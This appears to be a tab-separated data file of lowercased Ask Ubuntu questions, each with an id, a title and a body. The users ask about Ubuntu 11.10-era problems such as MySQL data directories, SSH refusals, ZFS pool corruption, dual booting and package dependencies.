99142	how to set svn info response/call result language ?	i have localized russian ubuntu 11.10 . but all my scripts use stuff like remote_rev=`svn info $ remote_repo | grep '^revision : ' | awk ' { print $ 2 } '` where in my localization ^редакция : would do the job . i wonder if it is possible to tall svn info in what language to responde instad of rewriting\localizing all my scripts grep stuff ?
99144	how can i permantly increase the entropy_avail level ?	i have noticed so keyboard/mouse hanging and other issues since i bought my new computer and installed ubuntu 11.10 . i researched where increasing the /proc/sys/kernel/random/entropy_avail helps and it does . currently i do this by running $ ls -r / in a terminal . of course this just reads the directory and files . it does in fact raise it to 4000 plus . then it drops back down to 300 and 400 . after looking and trying to find a solution , how can i increase the entrophy_avail without manually lsing the hard drives from the terminal ? i must confess that i have been using ubuntu full time since 8.04 and windows completely free since natty . i do n't really understand this entropy_avail but my computer seems to do better when it is high at peak usage .
99152	how to i install on an htc shift ?	the umpc htc shift is about 4 years old but could anyone tell me how to install ubuntu 11.10 on a htc shift ? i have searched for hours for a solution and tried some manuals and how tos but nothing works . the main problem : wifi marvell sd8686 does not work i tried lspci , lshw and everything shows nothing about any wlan device .
99153	does ubuntu have any comic/anime/manga/series about it ?	as some communities have their own comic , manga , anime , tv series , does ubuntu have one related to it , to the developers , the ubuntu scenario or something related to it .
99156	ubuntu server driver source catalog	where do i find this drivers on my .iso image for the server software , or what is the ftp : location to download these files as those are the two options i am given on how to solve this issue . ubuntu-server 11.10 , hardware : dell r210 what i am reading is that i am possibly missing 'mpt2sas ' driver somewhere in this boot disc . i 'm attempting to download a different version in the hopes that the mistake i made was downloading software meant for an amd architecture .
99160	how to remap emacs evil-mode toggle key from ctrl-z ?	i 'd like to remap the toggle key for emacs evil mode . from ctrl+z to something that wo n't confuse me like the cua bindings ( i 'd like ctrl+alt+` , but i think that terms do n't recognize that one ) . in this external thread is a discussion on trying to do this with viper mode . once one is fairly used to using less , gmail , and vimium , the vim key bindings for browsing are nice to go easy on the hands when mostly reading files . less hitting the ctrl which helps the hands/wrists .
99163	wine problem when playing ace of spades	so i 've been trying to play ace of spades for a while now . and yesterday i was able to do that for about 5 seconds before realizing that the mouse was n't nearly sensitive enough . so i changed the sensitivity in nano and tried to run it again i got this error when i typed in wine ~/.wine/drive_c/ace\ of\ spades/client.exe aos : //3735504972 fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 fixme : msvcr90 : __clean_type_info_names_internal ( 0x3a04c4 ) stub fixme : msvcr90 : __clean_type_info_names_internal ( 0x35f78c ) stub fixme : msvcr90 : __clean_type_info_names_internal ( 0x1911884 ) stub i tried uninstalling ace of spades and reinstalled it still there . i also tried doing that with wine , even deleting the ~/.wine directory or whatever it 's important to note that i 've had linux for about 3 days so i know the very basics but beyond that i ca n't really do much i think it 's wine because when i googled it only wine errors came up but hey i 'm probably wrong . feel free to tell me to do something i 've already done , just explain it to me a bit simpler than usual
99165	lubuntu-desktop package interfered with the graphics for my ubuntu desktop	i installed the lubuntu-desktop package with all it 's dependencies recently and since then the graphics of my other desktops , ubuntu , 2d ubuntu and gnome-shell are ruined . by ruined i mean i do n't know what happened . it ' not just the compositing , compiz is still running and restarting it does nothing . another thing i noticed is the lubuntu splash screen shows up during boot and shutdown whether i was in a lubuntu session or not . sorry for such little info . any ideas ? 32bit 11.10
99167	mysql change datadir , problem with mysqld.sock	i tried to change the database directory , datadir , i did the following steps . my machine : laptop ubuntu 11.10 64-bit install : sudo apt-get install mysql-server mysql-client all ok , i can create databases , tables , all ok. change the datadir : 1 ) $ /etc/init.d/mysql stop 2 ) $ cp -r -p /var/lib/mysql /new_path 3 ) $ rm /new_path ( this only remove files unnecessary ) 4 ) $ gedit /etc/mysql/my.cnf change the `` datadir = var/lib/mysql '' to the new path . 5 ) $ gedit /etc/apparmor.d/usr.sbin.mysqld change the `` /var/lib/mysql '' to the new lines with `` /new_path/mysql '' 6 ) $ /etc/init.d/apparmor reload 7 ) $ /etc/init.d/mysql restart 8 ) $ service mysql status ( is ok ) the error is the following . error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 111 ) i tried to change the permissions in /new_path/mysql and did n't work . i tried to copy only the databases ( not all files in mysql dir ) and it did n't work i saw in other forum that i have to change the /etc/apparmor.d/usr.sbin.mysqld the following /var/run/mysqld/mysqld.pid w , /var/run/mysqld/mysqld.sock w , replace `` /var/run/mysqld/mysqld '' by `` / { , var/ } run/mysqld/mysqld '' but in my case it was with `` / { , var/ } run/mysqld/mysqld '' by default . please i need help , i have 2 weeks with this problem . thanks .
99175	'echo dis > /sys/kernel/debug/vgaswitcheroo/switch ' does not work	i can not use echo dis > /sys/kernel/debug/vgaswitcheroo/switch to switch to discrete ati card . after i run the command , cat /sys/kernel/debug/vgaswitcheroo/switch still gives : 0 : igd : + : pwr:0000:00:02.0 1 : dis : : pwr:0000:01:00.0 i use ubuntu 11.10 amd64 arch in lenovo thinkpad w500 . what is the matter ?
99185	how to delete files/folders etc	i intend to sell my laptop and therefor i am looking for some solution to my problem . how to get rid of all date in a secure manner ? and as well the files which were deleted in the past are throughout some software still accessible . my disc has couple partitions . i do n't want others to read my emails , see my photos etc . what is the best way ?
99186	how to use text extracted from the `` grep '' command as an argument in a bash script ?	i have a file called `` krylov_methods '' , which has text like this : cg - preconditioned cgne - normal equations nash - cg subject to constraint stcg - another method for constraints gmres - general minimum residual ... i need to extract the first word ( character string ) of each line , one by one , in a shell script and use it as a command line argument within that script . to extract the first word , i used the following command : head -1 krylov_methods | tail -1 | awk ' { print $ 1 } ' head -2 krylov_methods | tail -1 | awk ' { print $ 1 } ' head -3 krylov_methods | tail -1 | awk ' { print $ 1 } ' ... this seems to work well for extracting the first word of each line one by one however , i need to be able to store the character string as a variable for future use within the script . for example , since the first word of the first line of the file `` krylov_methods '' is the word `` cg '' , i want to be able store `` cg '' to a variable called `` method '' . within the script , i would like for it to get something like : method=cg ./execute $ method is this possible to store the result of the 'head ' command used within a shell script ?
99200	ca n't login after fresh install of ubuntu 11.10	the situation i have just went through a fresh install on 32bit version of ubuntu 11.10 . after the installation finished the computer rebooted and a login screen shows up . i entered my password from the installation steps and it does n't accept it . what i have tried i reinstalled again with the same result . i have entered the recovery mode by booting up my machine and holding shift and i selected `` ubuntu , with linux 3.0.0-12 ( recovery mode ) '' then selecting `` root drop to root shell prompt '' . i then tried passwd adam ( adam being my username ) and entered a new password . on screen i get passwd : authenication token manipulation error passwd : password unchanged so i tried the following instructions with no luck : also make sure you are mounting the file system read/write . after immediately selecting 'drop into root shell prompt ' i found the filesystem was mounted read only , which prevents resetting the password . choosing the option to remount / as read/write and going back into the root shell prompt enabled the password change . and i tried the following instructions with no luck : check the permissions on your /etc/shadow file . they must be set to 000 or you can not edit user password data . which gave me the following : -rw-r -- -- - 1 root shadow 1045 2012-01-28 00:13 shadow
99202	how to mount a cd rom from a usb cd rom drive on ubuntu 10.04.3 server	i am trying to mount the installation cd rom drive using a usb cd rom drive on ubuntu 10.4.3 server to extract additional packages ( since i do not have internet active on the server ) . i plugged the cd rom drive and inserted the cd and i could not find any auto mounting happening . i could not figure out what would be the device name to manually mount . looks like it is not /dev/sr0 . any guidance on mounting a cd on ubuntu server is appreciated . edit based on the answer from christopher , here is more information , /0/1 scsi6 storage /0/1/0.0.0 /dev/cdrom disk dvd rw ad-7560s /0/1/0.0.0/0 /dev/cdrom disk so i guess the device name would be /dev/cdrom and i should be able to mount it with the following command sudo mount /dev/cdrom /mnt i get the following error . mount : /dev/sr0 : unknown device however i can automount the cd in my ubuntu 10.10 desktop edition . so please confirm i am recognising the correct /dev/ < dev name >
99203	is there any difference in using switch user and login ?	i have configured my ubuntu oneiric to automatically login to a standard user account . this setup is for my parents who do n't know much about computers . but when i use it i need to login as an administrator . so is there any difference between using the switch user option and using logoff and login in terms of pc resource utilization ?
99204	should i install 32 or 64 bit ubuntu	my computer is a gateway nv55s17 with a 64 bit processor . the ubuntu website said 32 bit recommended so i dunno which to pick
99206	how to hide specific lens from search results	i want to be able to hide some search results from dash and only show them when i click on that particular lens . for example , i want to hide gwibber posts from the general search results ( when the `` home '' icon is selected ) and only show the results when i select the gwibber lens .
99210	ssh between 2 pcs	i 've successfully managed to setup ssh server individually on 2 pcs ( master and slave setup ) . i can login from the slave to the master but the vice versa is n't happening . from he individual pcs i can login to the localhost also . can someone help me out ? i 've disabled the firewalls and tried everything . should i provide more specific details regd this ? i 've installed the openssh-server on both pcs already . and i 'm using the above mentioned syntax . also , the error message i 'm getting is : ssh uname @ 10.5.10.251 ssh : connect to host 10.5.10.251 port 22 : connection refused whereas this works perfectly fine when i ssh from the slave . on trying ssh -v i get : openssh_5.8p1 debian-7ubuntu1 , openssl 1.0.0e 6 sep 2011 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : applying options for * debug1 : connecting to 10.5.10.251 [ 10.5.10.251 ] port 22. debug1 : connect to address 10.5.10.251 port 22 : connection refused ssh : connect to host 10.5.10.251 port 22 : connection refused and pinging the slave from master works fine . this means that master is able to reach slave , right ? also , i 've disabled the firewall on the slave using the ui .
99213	why am i not able to send an email from command line	this is what i did ( as per a few discussions on this website ) mail -s `` hi '' addressee @ email.xyz < test.txt where text.txt has the message . i checked to see if mail did exist and it does at /usr/bin/mail what am i missing ? is there a daemon that must be running ? is there more to this ? i am running ubuntu 11.10
99224	easy way to setup vpn server/client ?	i have root access on a server and i can access my server through ssh and my server and my laptop run ubuntu . what 's the easiest way to setup vpn server/client such that when i connect the vpn all of internet connections go through the server ?
99228	does 'unredirect fullscreen windows ' option in compiz improve performance for video playback ?	i found this option in ccsm . it 's unchecked by default . there 's a tooltip explaining that it allows drawing on fullscreen windows to not be redirected to offscreen pixmaps .
99229	skype eula pops up at every startup	everytime i boot my computer , skype starts automatically after login . the problem is two fold : * it keeps asking me to accept the licence agreement * it keeps forgetting my password that 's quite annoying . does anyone have any idea of where the problem might be coming from ? it 's been like that for a while , but i ca n't pinpoint when it started exactly .
99232	how to make a jar file run on startup & and when you log out ?	i have no idea where to start looking . i 've been reading about daemons and did n't understand the concept . more details : i 've been writing a crawler which never stops and crawlers over rss in the internet . the crawler has been written in java - therefore its a jar right now . i 'm an administrator on a machine that has ubuntu 11.04 . there is some chances for the machine to crash , so i 'd like the crawler to run every time you startup the machine . furthermore , i 'd like it to keep running even when i logged out . i 'm not sure this is possible , but most of the time i 'm logged out , and i still want to it crawl . any ideas ? can someone point me in the right direction ? just looking for the simplest solution .
99233	ubuntu does not start	i am using ubuntu 11.10 . on powering on grub loader asks me to boot normally or in recovery mode . on booting normally it checks the hard disk for errors and stops at 80 % and on ignoring it i can get to the login screen but on entering my login information it shows an error saying panic occurred switching back to text console ! . i cant get any further ... cant get further in recovery mode also ! somebody please help o do n't have the backup of my data and its pretty important ! yes i only asked the question bruno ! i tried both of them on live usb ! 11.10 and 12.04..but they do n't start ! it reaches till the ubuntu loading screen and then it shuts down just like that !
99237	lightweight music player	is there any ultra lightweight music player for ubuntu ( like foobar ) ? preferably with unity taskbar integration .
99243	shutdown during 'apt-get upgrade ' and can not enter system	i power off my laptop with ubuntu 11.10 during apt-get upgrade , then i power on and choose ubuntu in grub , but after the ubuntu logo , a blurred screen comes . then i choose recovery mode in grub , and then i can type commands as root , i tried apt-get upgrade and it tells something wrong with /var/lib/dpkg/lock , and suggest dpkg -- configure -a , then i tried dpkg -- configure -a but comes something wrong because read-only file system , then i have no idea.. any suggest will be helpful .
99245	home no such file or directory ?	i have a switched graphics laptop . often when i up update ubuntu ( i am on on 3.00.00.14 ) it overwrites the radeon driver and when i dont have that i cant boot . until someone tells me a better way i usually go into the downloads directory where i keep a copy of the driver and re-install . this time after i login from recovery . when i type cd/home/antony/downloads it tells me -bash : cd/home/antony/downloads : no such file or directory ... .. can someone tell me what i am doing wrong ? thank you
99247	have banshee change folder structures inside music folder after editing mp3 meta-data	if i edit say an artist name inside banshee that uses an alternative spelling in order to merge the folder with the other folder for the same artist using the correct spelling of the artist 's name , it does n't affect my music folder . but i want the changes i make to the mp3 's meta-data to take effect inside my music folder . is that possible ?
99252	dual boot not working ( windows xp )	i have just installed ubuntu 11.10 alongside my existing xp operating system . when i startup i get a message that display is not optimal resolution and then it automatically boots into ubuntu . any suggestions , please ? cheers
99255	cpu overheating on a sony vaio vpcea15fg	i have installed ubuntu besides windows7 on my laptop ( vaio sony vpcea15fg ) . i can work with windows for several hours without any problem ; but as soon as i log into ubuntu , my cpu overheats to 80c and turns off after less than 5 minutes . any idea how can i solve this problem ?
99259	i have extreme lag after updating a lot of kde packages - what to do now ?	i 'm running kde 4.8 on ubuntu 11.10 . two days ago i updated from 4.7 to 4.8 and yesterday there were a lot ( 75 ) packages i could update , which i did . today i started my pc and i have an extreme lag . most stuff does n't even react when clicked and it takes about 20s until i see the text i typed into textareas . sudo top showed me that the cpu usage is very low ( 2-3 % ) . restarting the pc or the kde plasma-desktop did not help either . what am i supposed to do now ? is there any way to fix this without reinstalling kde or the complete system ?
99262	indicator-loader displays empty window	i 'm developing an indicator and use indicator-loader for testing . it has been running correctly for some time , but now it just displays an empty window . /usr/lib/libindicator/indicator-loader /usr/lib/indicators/6/libdatetime.so or /usr/lib/libindicator/indicator-loader3 /usr/lib/indicators3/6/libmessaging.so - an empty gtk window is created with no icon or a label . any ideas how to solve it ? other info : ubuntu 10.10 , installed -tools and -dev packages for both libindicator and libindicator3
99263	use setpci to restart ubuntu server after power failure on macbook	i installed ubuntu server 11.10 on my macbook 1,1 . in order to reboot after power failure i have to set a specific `` afterg3 '' bit using setpci . the solution for a macmini can be found here : http : //serverfault.com/questions/203522/reboot-after-power-failure-for-mac-running-ubuntu-server does anybody have an idea how to find out the corresponding command for my hardware ? david
99266	what to do about a corrupted zfs pool	have been running a test instance of a nas using a zfs as mentioned in restoring an ubuntu server using zfs raidz for data . this week one of my disks died . should n't be a problem , should it ( the benefits of raid being resilience as well as performance ) ? except that my zfs pool got corrupted , as in : andy @ ubuntu : ~ $ sudo zpool status -v pool : tank state : unavail status : one or more devices could not be used because the label is missing or invalid . there are insufficient replicas for the pool to continue functioning . action : destroy and re-create the pool from a backup source . see : http : //www.sun.com/msg/zfs-8000-5e scan : none requested config : name state read write cksum tank unavail 0 0 0 insufficient replicas raidz1-0 unavail 0 0 0 insufficient replicas sdb faulted 0 0 0 corrupted data sdc faulted 0 0 0 corrupted data sdd unavail 0 0 0 fortunately this is a test instance and so i can easily start again . but what if this pool contained important data ? what would the right next step ( s ) be to recover the data and restore my nas to working order ? or does zfs automatically try all possible restoration approaches , such that the data is now toast ?
99267	dual boot ubuntu installation mishap	i have windows 7 pc , where i had 2 partitions , a c drive for my system files and a d drive for my data . i decided to install ubuntu 11.10 a couple of days ago and thought of install it in a separate partition of its own . so i made a separate linux partition of 30gb . i downloaded ubuntu on my usb stick and installed . during the installation process i was asked where to install ubuntu so i opened up a screen that was similar to this one there were six partitions present ( i had made only 3 partition via windows ) . their names were totally different from the ones that i had given in windows . so i selected a drive which had the same size as my linux partition that i had made in windows ( no other partition had the same size ) . i clicked on install now and got an error message saying that `` there was no root folder set '' . i set the newly made partition as my root folder and clicked install now . now out of the 6 partitions that were created 3 were logical ( i had only created 3 partitions in windows ) . as soon as i clicked install now , the system asked me where i wanted to put my `` swap space '' . i selected one of the logical drives and hit install . ubuntu successfully installed on my system and at the end it asked me to reboot . i did and got the following error message : '' missing operating system '' . i was shocked . i tried my windows recovery disk ( that i had gotten when i had purchased my laptop ) and there i went into startup repair . in the startup repair option i was not able to locate windows . the system asked me to click the `` load drivers '' button to load the drivers to my harddrive where windows was installed , but i could not locate any drivers to my harddrive . i tried this several times but to no success . i panicked and installed ubuntu , now this time click `` ok '' at every step ( not worrying about the partition and all ) . the os installed correctly and i am now able to access my harddrive . no data within the c drive is lost . all the windows system files are intact . i wish to recover my windows installation . how do i go about it ? thank you in advance . i do not want to format my computer and install windows again .
99269	how do i print a pdf file ?	i installed ubuntu 11.10 on my inspiron 9100 a week ago . i have a hp laser jet 1100 connected to it . i can print a file from libreoffice write . so the printer is working . now , the question is , how do i print a pdf file ( or few pages of a pdf file ) ? when i click the pdf file , some package opens the file . i can view the file , but it does not provide any option to print the file . what am i missing ? thanks in advance .
99280	can i access my cloud files without accessing my home computer ?	what do i need to do if i am away and without my home computer and i need to access my cloud files ? can i connect using any other computer in another part of the world ?
99288	`` amd unsupported hardware '' error message is displayed	i have a samsung 305u1a netbook and just installed the amd/ati generic driver for my amd radeon hd 6320 rebooted my pc and a little box `` amd unsupported hardware ''
99291	execute `` complex '' command in .desktop file ( unity quicklist )	i 'm trying to create an twitter quicklist desktop file , but i can figured how to resolve one thing . to compose an message at twitter , i made the following command : exec=xdg-open 'https : //twitter.com/ # ! / ' & & sleep 3 & & xdotool key n ( execute ) + ( open browser ) + ( twitter main url ) + some seconds to open + keyboard shorcut to compose . if i use in terminal , works fine . but in the .desktop file ( to make unity quicklist ) it just does n't work . any idea how to fix it ?
99292	how do i get the version of an application from the command line ?	i would like to know how to get the version information of an installed program that does n't have the -- version or -version method implemented .
99298	why is my dell inspiron 1720 's keyboard and trackpad inactive after resume from suspend ?	i 'm using ubuntu 11.10 on my dell inspiron 1720 laptop , and it works perfectly apart from coming out of suspend . the login screen comes up , but the keyboard and trackpad are completely unresponsive . the only option is to hold the power button to do a hard shutdown ( pressing it once does n't bring up the shutdown menu as it normally does ) . does anyone have any suggestions as to how to fix this or even get more information on what 's happening ?
99301	i erased osx when i installed ubuntu , how do i set up dual boot	i have a macbook pro 8,1 running ubuntu 11.10 on it . before i wiped osx clean off it , i was running osx lion . this computer was shipped with snow leopard on it so i know it will work on it , but when i try to run the install disk ( even before ubuntu while on lion ) i got all kinds of kernel panic and it told me to restart my computer . i just want a dual boot set up so how do i make a partition in ubuntu and put mac on it ?
99302	standart menu showing with transperant theme	i 'm using a transparent theme and i can see the menu bar underneath :
99304	ubuntu one , music streaming	i 'm running ubuntu 11.10 , and just signed up for ubuntu one and ubuntu one music . generally file sync is working fine , but music has been a complete failure so far . here 's what i 'm looking at : after 24 hours , not a single mp3 or ogg file from my laptop has sync 'd to the cloud music folder . i have 4 gigs of data used , which is definitely not enough to include music files . that 's about the right amount for my docs and photos . with music , it should be more like 13 gigs . no music shows up on the ubuntu one music app on my phone , nor on the web view of my ubuntu one cloud folder i followed all the online instructions i could find . basically , on my laptop , right click on the music folder and select `` ubuntu one > synchronize this folder '' the music folder now has a green check mark on it indicating its sync'd the ubuntu one app on my laptop says `` file sync is up to date '' i did provide credit card information , and on the ubuntu one website `` music streaming '' is listed as one of my services . so what am i doing wrong ? just read this post as i 'm experiencing the same problem , the answer for this post says that due to the large number of files trying to be uploaded , that it could take up to a week . however i am , as above also being told that `` file sync is up to date '' can somebody confirm that this is a bug and that i just need to wait for file sync to actually be up to date ? cheers
99309	drive says it 's full when it is not	i have a hard drive that should have close to 40gb free . however , when i just restarted the computer , ubuntu popped up with the notification stating that the drive has 0 bytes of space remaining . when i run df -h i get the following output : filesystem size used avail use % mounted on /dev/sdc5 721g 684g 0 100 % /media/storage1 as you can tell , 684g + 0gb ! = 721gb , instead i should have 37gb available . running fsck /dev/sdc5 showed that there are no problems and nothing was recovered on the ext3 mount . where did my missing 30gb go ? how can i get them back ?
99314	ubuntu open ports	i have recently installed two ubuntu server machines and i would like to find the open ports in the machine . when i run nmap from my machine ( ubuntu 11.10 ) i observed that both servers have 135/tcp filtered msrpc 4444/tcp filtered krb524 4662/tcp filtered edonkey 5000/tcp filtered upnp 5631/tcp filtered pcanywheredata i have never opened those ports . i only installed lamp and samba . why are these ports open ? the complete list of the open ports are : 22/tcp open ssh 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 135/tcp filtered msrpc 139/tcp open netbios-ssn 143/tcp open imap 445/tcp open microsoft-ds 993/tcp open imaps 995/tcp open pop3s 4444/tcp filtered krb524 4662/tcp filtered edonkey 5000/tcp filtered upnp 5631/tcp filtered pcanywheredata the question is why are these ports open : 135/tcp filtered msrpc , 4444/tcp filtered krb524 , 4662/tcp filtered edonkey . 5000/tcp filtered upnp , 5631/tcp filtered pcanywheredata . i have never opened those ports . i only installed lamp and samba . does that list seem secure ?
99315	problem with redcar installation	i tried to install redcar by following instructions from here . i installed jruby as it was mentioned , but when i tried to run this command : jruby -s bundle install i get error like this : jruby : no such file , directory , or command -- bundle edit : i tried even running : sudo gem install redcar ( after installing required packages ) , which gives a warning : warning : invalid .gemspec format in '/var/lib/gems/1.8/specifications/redcar-0.13.gemspec' and then proceeds like this : successfully installed redcar-0.13 1 gem installed installing ri documentation for redcar-0.13 ... installing rdoc documentation for redcar-0.13 ... and got stopped ! i 'm very new to ubuntu , i do n't know what this error mean . thanks in advance .
99317	installing sims 3 from cd	i 've just gone over to ubuntu and need to install sims 3 for my daughter . in windows , it just pops up run menu , but nothing when i put cd in ubuntu . any ideas at all .
99318	how can i get policykit-1-kde to preselect the current user ?	on my new kubuntu 11.10 system , there are two users with administrative rights ( paulo and administranto ) . whenever i now from a kde gui dialog do some action which needs administrative rights , i get a dialog like the one showing below , asking me to select a user and type the password . i ca n't start typing the password before i select the user name , and i need to use the mouse ( or some combination of arrow-down , back-tab , arrow-down ) to select the right user from the list . i 'm just now logged in as paulo - how can i configure it to preselect the current user and focus the password box right away ? ( yes , this screen shot has a strange mix of esperanto and german . looks like the esperanto translation is not yet complete . ) a workaround would be to remove the administrator rights from the second user , but this is not what i want , really . ( this still happens on 12.04 , but i just filed a bug report/feature request . )
99319	is it safe to use the linux mint repository in ubuntu ?	let 's say , for instance , i wanted to try the cinnamon desktop in ubuntu . are there any dangers ( in terms of stability & security ) in adding the linux mint repository to my software sources ? should i opt instead for the ppa created especially for ubuntu ?
99321	upgrade to firefox 9 crazy dependencies ?	today i logged into my ubuntu 10.04 remote dekstop machine for the first time in a while . i noticed that firefox 3.6 would be upgraded to firefox 9 . i typed `` sudo aptitude safe-upgrade '' at the terminal and found out that the upgrade would require 430 mb of disk space . there is a kernel update among , but i still think that 430 mb is very much . the list of dependencies required is very long : apturl-kde { a } exiv2 { a } firefox-locale-en { a } gdebi-core { a } gdebi-kde { a } hal { a } hal-info { a } icoutils { a } install-package { a } kdebase-runtime { a } kdebase-runtime-data { a } kdelibs-bin { a } kdelibs5 { a } kdelibs5-data { a } kdepimlibs-data { a } kdepimlibs5 { a } kdesudo { a } kpackagekit { a } kubuntu-debug-installer { a } libakonadiprivate1 { a } libattica0 { a } libboost-program-options1.40.0 { a } libclucene0ldbl { a } libdbusmenu-qt2 { a } libexiv2-6 { a } libgif4 { a } libgpgme11 { a } libilmbase6 { a } libiodbc2 { a } libopenexr6 { a } libpackagekit-glib2-12 { a } libpackagekit-qt-12 { a } libphonon4 { a } libplasma3 { a } libpolkit-qt-1-0 { a } libpth20 { a } libqca2 { a } libqt4-assistant { a } libqt4-dbus { a } libqt4-designer { a } libqt4-help { a } libqt4-qt3support { a } libqt4-script { a } libqt4-scripttools { a } libqt4-sql { a } libqt4-sql-sqlite { a } libqt4-svg { a } libqt4-test { a } libqt4-webkit { a } libqt4-xml { a } libqt4-xmlpatterns { a } libraptor1 { a } librasqal2 { a } librdf0 { a } libsoprano4 { a } libssh-4 { a } libstreamanalyzer0 { a } libstreams0 { a } oxygen-icon-theme { a } packagekit { a } packagekit-backend-apt { a } phonon { a } phonon-backend-null { a } plasma-scriptengine-javascript { a } polkit-kde-1 { a } python-kde4 { a } python-packagekit { a } python-qt4 { a } python-sip { a } shared-desktop-ontologies { a } smartdimmer { a } software-properties-kde { a } soprano-daemon { a } ttf-dejavu { a } ttf-dejavu-extra { a } update-manager-kde { a } virtuoso-nepomuk { a } x11-xserver-utils { a } xdg-utils { a } xul-ext-ubufox { a } it seems crazy to me that so many kde an qt packages are required to upgrade firefox , if i wanted them i had choosed kubuntu instead of ubuntu . it also seems weird to me that hal and hal-info are going to be installed , i thought that almost every linux disto was going away from hal because it is big mess , but now it is required ? can anybody with an ubuntu 10.04 installation confirm that they had the same massive amount of dependencies when they upgraded to firefox 9 , or is there been some sort of dependency mistake in my cas ? to include more information in my question , i tried to uninstall firefox and then upgrade all the other packages , this was about 130 mb , then i tried to install firefox again , but now only 31 mb was required . the package installed without any problems and now my remote desktop has firefox 9 without any kde or qt dependencies . i think that pages load more smooth and quicker in firefox 9 , so this is great .
99323	cinnamon , desktop without panel	i have installed the cinnamon without problems from the ppa . when i want to test it , the desktop shows no panel after login ! i 'm using ubuntu 11.10 with gnome 3.2 . it seems as if some gnome extensions did not work together with cinnamon . do you have any experience in that ?
99332	equinox theme widgets in unity do n't appear in the gtk+ theme dropdown list	i installed the equinox theme from the ppa : sudo add-apt-repository ppa : tiheum/equinox sudo apt-get update & & sudo apt-get install gtk2-engines-equinox i have used gnome-tweak-tool to change the window borders to equinox evolution squared but the equinox theme does n't appear in the 'gtk+ theme ' drop-down option list . my question is how can i enable the equinox widgets ? i 'm on ubuntu 11.10 and using unity .
99333	how do i get transparent windows to show all windows beneath them ?	the kind of transparency i 'm seeing in ubuntu 11.10 is it will show the desktop wallpaper . this is not what i want . when i first installed ultimate edition , transparent windows would show the window right below them , not the desktop . this is the kind of transparency that i want . how can i get ubuntu to function like this again ?
99334	how to change terminal settings by file configuration ?	i want to use a text editor like vim to edit various configuration options such as the following : in which configuration files are options like the above stored ?
99336	firefox process dies after ssh log out on remote machine	i need to run firefox process on a remote host via ssh and also keep process running even after ssh logout . i already have tried these ways nohup firefox & , screen , disown -h . but it seems these work only for the process without hardware display.because these work fine with my scripts and i can keep my scripts running even after ssh log out but i ca n't do the same for firefox . i am stuck with this for long . please help me out here !
99342	how to open ubuntu in second screen via virtualbox ?	i 've just install ubuntu 11.10 on virtual box . i 've download guest additions . how to view this vm in second screen in full screen mode ? when im opening full screen mode it 's opening on 1 main screen . best regards
99344	max vram supported by open source ati radeon	i have an ati hd6370 with dedicated 1g running on ubuntu 11.10 . following is the output from dmesg sourajit @ sourajit : /etc/x11 $ sudo dmesg | grep drm [ 5.149765 ] [ drm ] initialized drm 1.1.0 20060810 [ 5.606144 ] [ drm ] radeon defaulting to kernel modesetting . [ 5.606147 ] [ drm ] radeon kernel modesetting enabled . [ 5.606436 ] [ drm ] initializing kernel modesetting ( cedar 0x1002:0x68e4 0x17aa:0x397a ) . [ 5.606630 ] [ drm ] register mmio base : 0xe0600000 [ 5.606631 ] [ drm ] register mmio size : 131072 [ 6.475815 ] [ drm ] detected vram ram=1024m , bar=256m [ 6.475819 ] [ drm ] ram width 64bits ddr [ 6.475890 ] [ drm ] radeon : 1024m of vram memory ready [ 6.475891 ] [ drm ] radeon : 512m of gtt memory ready . however , this is the output of lspci , post install . what does this imply ? how much memory is radeon actually using ? 01:00.0 vga compatible controller : ati technologies inc robson ce [ amd radeon hd 6300 series ] ( prog-if 00 [ vga controller ] ) subsystem : lenovo device 397a control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 42 **region 0 : memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] region 2 : memory at e0600000 ( 64-bit , non-prefetchable ) [ size=128k ] ** region 4 : i/o ports at 3000 [ size=256 ] expansion rom at e0620000 [ disabled ] [ size=128k ]
99345	how do i enable wireless on a macbook pro 5,2 ( 17-inch from mid-2009 ) ?	i just upgraded to ubuntu 11.10 on my ubuntu partition on my macbook pro and i love it . except i have no wireless option/icon to select a wireless network . i have done some digging online to see what i need to do to get the airport wireless to work as i had to do this once before on a older version of ubuntu . currently i am unable to find anything on how to get this to work , was wondering if someone has experienced the same issue or if someone with more knowledge on this subject matter could help ? interfaces : en1 : card type : airport extreme ( 0x14e4 , 0x8d ) firmware version : broadcom bcm43xx 1.0 ( 5.100.98.75.18 )
99348	where is the game item artwork in kbreakout ?	i am looking for the location of the bricks , gift , etc artwork so that if i wanted to play around with making my own private bricks etc , i could . i know how to build kbreakout , but i can not seem to find where game items art is .
99354	how do i stop banshee remembering what 's been played ?	how can i prevent banshee from remembering what files i have played ? i really hate the way it keeps surprising me by automatically playing , after the current track , the previous file it had played . i really hate that . i was just listening to a beautiful piece of music and in a nice mood when banshee , without asking me , immediately afterwards , started playing a really annoying answerphone message from earlier . my solution so far is to manually delete all files in the playlist , but obviously that 's not a long term solution . i can not find an option anywhere that says `` do not remember my history '' ( did i mention i hate the way banshee plays my files without asking me ? )
99367	how do i use get_media_file ( ) in the latest quickly ?	i am writing a project with quickly and gtk 3 and i want to use the get_media_file ( ) helper so i can load an icon in my data/media directory . i ca n't see how i use get_media_file ( ) with the latest quickly ; it looks like the quickly helpers have changed . can anyone provide me with some sample code of how this works ?
